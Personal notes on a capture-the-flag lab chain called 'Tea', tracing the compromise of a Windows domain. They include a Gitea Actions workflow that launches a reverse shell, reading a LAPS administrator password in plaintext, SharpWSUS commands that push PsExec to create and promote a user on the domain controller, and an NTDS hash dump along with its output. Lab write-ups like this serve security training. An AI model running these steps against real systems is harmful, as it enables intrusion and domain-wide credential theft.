Tea (Chain)

This is not a writeup, just my notes about the machine.

Machine information

Operating System: Microsoft Windows Server 2022 Standard

Chain: True (2 Machines)

Credentials

Username

Password

Method

Scope

✅ Valid Usernames

🔑 Passwords list

Information Gathering

Nmap

Nmap scan report for 10.10.187.181
PORT     STATE SERVICE    REASON          VERSION
53/tcp   open  tcpwrapped syn-ack ttl 127
135/tcp  open  tcpwrapped syn-ack ttl 127
139/tcp  open  tcpwrapped syn-ack ttl 127
445/tcp  open  tcpwrapped syn-ack ttl 127
593/tcp  open  tcpwrapped syn-ack ttl 127
3389/tcp open  tcpwrapped syn-ack ttl 127
5985/tcp open  tcpwrapped syn-ack ttl 127

Nmap scan report for 10.10.187.182
PORT     STATE SERVICE    REASON          VERSION
80/tcp   open  tcpwrapped syn-ack ttl 127
135/tcp  open  tcpwrapped syn-ack ttl 127
139/tcp  open  tcpwrapped syn-ack ttl 127
445/tcp  open  tcpwrapped syn-ack ttl 127
3389/tcp open  tcpwrapped syn-ack ttl 127
5985/tcp open  tcpwrapped syn-ack ttl 127

Service Enumeration

10.10.187.181

DNS

Not vulnerable to DNS Zone Transfer

SMB (enum4linux-ng)

Domain SID: S-1-5-21-4071478895-3826761629-2568933575
Domain: tea.vl
FQDN: DC.tea.vl
Server allows null session authentication
Parent Domain
signing: True (Not vulnerable to NTLM Relay)

10.10.187.182

HTTP:80 (Simple IIS Default Web Site)

HTTP:3000 Gitea

Compromising SRV Server

Signing up a gitea account

Discovering a Runner into the gitea instance

Useful doc: hacking-on-gitea-actions

Exploiting Gitea via Runners

Requirements:

Create a new repository
Enable Repository Actions
Upload the next file: .gitea/workflows/filename.yaml

name: Gitea Actions Demo
run-name: Hacking via Gitea Actions 🚀
on: [push]
jobs:
  Explore-Gitea-Actions:
    runs-on: windows-latest
    steps:
      - run: <hoaxshell>

Reading LAPS credentials

During the enumeration the tester found a files that indicate the presence of LAPS into the system.

PS C:\Temp > Get-LapsADPassword -Identity srv -AsPlainText
ComputerName        : SRV
DistinguishedName   : CN=SRV,OU=Servers,DC=tea,DC=vl
Account             : Administrator
Password            : ze4X81s3@GEm%3
PasswordUpdateTime  : 4/23/2025 9:22:32 PM
ExpirationTimestamp : 5/23/2025 9:22:32 PM
Source              : EncryptedPassword
DecryptionStatus    : Success
AuthorizedDecryptor : TEA\Server Administration

Compromising Domain Controller DC.TEA.VL

Inspecting the WSUS into the computer

Tool: SharpWSUS (Recommended Version)

C:\Users\Administrator\Desktop>.\SharpWSUS.exe inspect

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Inspect WSUS Server
C:\WSUS-Updates\WsusContent

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
SRV, 8530, C:\WSUS-Updates\WsusContent


####################### Computer Enumeration #######################
ComputerName, IPAddress, OSVersion, LastCheckInTime
---------------------------------------------------
dc.tea.vl, 10.10.170.85, 10.0.20348.2031, 4/24/2025 6:18:30 AM

####################### Downstream Server Enumeration #######################
ComputerName, OSVersion, LastCheckInTime
---------------------------------------------------

####################### Group Enumeration #######################
GroupName
---------------------------------------------------
All Computers
Downstream Servers
Unassigned Computers

[*] Inspect complete


C:\Users\Administrator\Desktop>

Abusing Windows Server Update Services (WSUS)

C:\Users\Administrator\Desktop> SharpWSUS.exe create /payload:"C:\_install\PsExec64.exe" /args:"-accepteula -s -d cmd.exe  /c \" net user Intrusionz3r0 P@assword123 /add \"" /title:"Creating User"
C:\Users\Administrator\Desktop> SharpWSUS.exe approve /updateid:ebe6db84-afe1-46f0-94a0-6741da7d000f /computername:dc.tea.vl /groupname:"Creating User"
C:\Users\Administrator\Desktop> SharpWSUS.exe create /payload:"C:\_install\PsExec64.exe" /args:"-accepteula -s -d cmd.exe  /c \"net localgroup administrators Intrusionz3r0 /add \"" /title:"Adding to Admin"
C:\Users\Administrator\Desktop> SharpWSUS.exe approve /updateid:ebe6db84-afe1-46f0-94a0-6741da7d000f /computername:dc.tea.vl /groupname:"Adding to Admin"

Dumping Administrator NT hash

 nxc smb 10.10.170.85 -u 'Intrusionz3r0' -p 'P@assword123'  --ntds --user Administrator
SMB         10.10.170.85    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False)
SMB         10.10.170.85    445    DC               [+] tea.vl\Intrusionz3r0:P@assword123 (Pwn3d!)
SMB         10.10.170.85    445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.170.85    445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:c98bef04d073b4607daee561364ff612:::

Last updated 6 months ago

hashtagMachine information

hashtagCredentials

hashtagInformation Gathering

hashtagService Enumeration

hashtag10.10.187.181

hashtagDNS

hashtagSMB (enum4linux-ng)

hashtag10.10.187.182

hashtagHTTP:80 (Simple IIS Default Web Site)

hashtagHTTP:3000 Gitea

hashtagCompromising SRV Server

hashtagSigning up a gitea account

hashtagDiscovering a Runner into the gitea instance

hashtagExploiting Gitea via Runners

hashtagReading LAPS credentials

hashtagCompromising Domain Controller DC.TEA.VL

hashtagInspecting the WSUS into the computer

hashtagAbusing Windows Server Update Services (WSUS)

hashtagDumping Administrator NT hash